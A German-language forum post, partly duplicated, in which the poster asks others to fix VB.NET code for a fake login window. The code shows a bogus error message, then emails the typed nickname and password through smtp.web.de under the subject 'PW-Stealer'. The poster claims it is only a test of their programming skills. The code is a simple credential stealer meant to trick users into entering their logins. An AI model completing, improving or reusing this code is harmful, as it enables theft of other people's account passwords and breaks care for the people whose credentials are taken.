Hallo,
ich habe ein programm erstellt das passwort und nickname an meiner e-mail adresse senden soll,nur leider weiß ich nicht wie ich folgenden code richtig bei den Einlogg button erstellen soll.
Passwort sowie nickname sollen an meine e-mail adresse gesendet werden.
Wenn mir einer dabei behilflich sein will,dann bitte ich darum z.b test.web.de oda test.gmx.de oder von anderen anbietern hinzuschreiben,ich mach mir dann die dazu gehörige e-mail fertig.
Dies Programm dient nicht zu Bösen Zwecken,es ist lediglich ein test,ob meine programmierkentnisse und mein Programm funktionieren.
Vielen Dank im vorraus.
Bitte schreibt mir den richtigen code hin :)
ich habe ein programm erstellt das passwort und nickname an meiner e-mail adresse senden soll,nur leider weiß ich nicht wie ich folgenden code richtig bei den Einlogg button erstellen soll.
Code:
Imports System.Net
Imports System.Net.Mail
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
MessageBox.Show("Deine Fehlermeldung")
Dim text As String
text = "Nick:" & TextBox1.Text & vbNewLine & "Passwort:" & TextBox2.Text
Dim myClient As New Net.Mail.SmtpClient("smtp.web.de")
myClient.Credentials = New Net.NetworkCredential ("Deine erste E-Mail Addresse", "Passwort dazu")
myClient.Send ("Deine erste E-Mail Addresse", "Deine zweite E-Mail Addresse", "PW-Stealer", text)
myClient.Send("Deine E-Mail Addresse", "Deine zweite E-Mail Addresse, An die wird dann der Nickname und das Passwort geschickt", "PW-Stealer", text)
End Sub
End Class
Wenn mir einer dabei behilflich sein will,dann bitte ich darum z.b test.web.de oda test.gmx.de oder von anderen anbietern hinzuschreiben,ich mach mir dann die dazu gehörige e-mail fertig.
Dies Programm dient nicht zu Bösen Zwecken,es ist lediglich ein test,ob meine programmierkentnisse und mein Programm funktionieren.
Vielen Dank im vorraus.
Bitte schreibt mir den richtigen code hin :)